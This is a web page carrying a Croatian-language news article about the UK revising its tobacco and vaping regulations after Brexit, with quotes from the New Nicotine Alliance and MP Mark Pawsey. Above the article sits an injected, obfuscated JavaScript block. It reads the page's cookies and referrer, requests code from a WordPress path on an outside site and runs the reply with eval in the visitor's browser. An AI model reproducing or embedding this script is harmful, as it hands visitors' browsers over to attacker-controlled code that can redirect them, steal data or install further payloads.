;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Brexit i prilika UK-a da reformira svoje propise o duhanu

S obzirom da zbog Brexita Ujedinjeno Kraljevstvo više ne mora biti u skladu s Direktivom Europske unije o duhanskim proizvodima (TPD), zemlja revidira svoje propise o duhanskim i srodnim proizvodima.

Ujedinjeno Kraljevstvo je bilo lider u odobravanju upotrebe sigurnijih alternativa za smanjenje štete od duhana, a lokalne stope pušenja to odražavaju. Ranije ove godine, e-cigarete su službeno priznate kao alat za prestanak pušenja od strane britanskog Nacionalnog instituta za izvrsnost u zdravstvu i njezi (NICE) i uključene u svoje novo izdane smjernice za duhan. Dok je javno zdravstvo Engleske (PHE), također agencija britanskog ministarstva zdravstva, poznato po tome što dosljedno preporučuje prelazak s pušenja na vaping kako bi se smanjila šteta.

A Brexit je, naravno, pružio zemlji priliku da preoblikuje svoju politiku smanjenja štete od duhana kako bi bila sveobuhvatnija, proaktivnija i progresivnija. Nakon odlaska sa zajedničkog tržišta, Ujedinjeno Kraljevstvo revidira svoje propise o duhanskim i srodnim proizvodima. Revizija, koja se mora održati pet godina nakon implementacije, poklapa se s četverogodišnjim intervalom predviđenim za reviziju TCP-a, čija je nova verzija predviđena za uvođenje do kraja ove godine.

Nova politika smanjenja štete od duhana

Ranije ove godine, New Nicotine Alliance (NNA) objasnila je da u ime britanskih potrošača vapinga i drugih nikotinskih proizvoda s niskim rizikom predlaže stvaranje “koherentnog okvira utemeljenog na riziku za sve sigurnije nikotinske proizvode” kako bi promicalii napredak u javnom zdravstvu te osobnoj i ekonomskoj dobrobiti u cijeloj zemlji.

NNA je naglasila kako predložene preporuke ne samo da bi ispunile vladine ciljeve uz novi plan, već i ne bi uključivale dodatne javne troškove. Štoviše, pozivajući se na zloglasni EU TPD i njegove kontraproduktivne učinke na smanjenje stope pušenja, NNA je rekla da nove preporuke nude “priliku da se vrati kontrola s pogrešaka propisa EU-a u ovom području politike”.

Nedavno je, nadovezujući se na spomenuto pismo, dobrotvorna organizacija ponovno napisala prijedlog nudeći opsežniji skup predloženih promjena politike, s ciljem maksimiziranja potencijala sigurnijih nikotinskih proizvoda kako bi se uskladili s vladinom planom „bez dima“ do 2030. Agencija je još jednom istaknula potrebu prihvatiti znanost i završiti sa zastarjelim ideološkim pristupima koji ne funkcioniraju.

Treba ojačati pragmatični pristup Ujedinjenog Kraljevstva

U međuvremenu, Mark Pawsey, konzervativni član parlamenta koji je 2014. osnovao APPG za Vaping, rekao je da bi pragmatičan pristup Ujedinjenog Kraljevstva trebao biti ojačan. “Ne bih želio preduhitriti ono što bi moglo biti u novom TPC-u, ali ono što se nadam da ću vidjeti je puno pozitivniji pristup u pogledu učinkovitosti vapinga iz perspektive smanjenja štete i prestanka pušenja. Ujedinjeno Kraljevstvo usvojilo je temeljen na dokazima, pragmatičan, a opet progresivan pristup vapingu i smanjenju štete, i to bi trebalo pojačati. Također bih želio vidjeti neke od transponiranih zakona EU-a iz Direktive o duhanskim proizvodima uklonjene iz domaćeg zakonodavstva, kao što su ograničenja veličine boca za e-tekućine i maksimalne jačine nikotina. Potonje je ključno u omogućavanju teškim pušačima da pređu na mnogo manje štetnu alternativu vapingu”, rekao je on, a prenosi TobaccoReporter.

Choose your Reaction!
Leave a Comment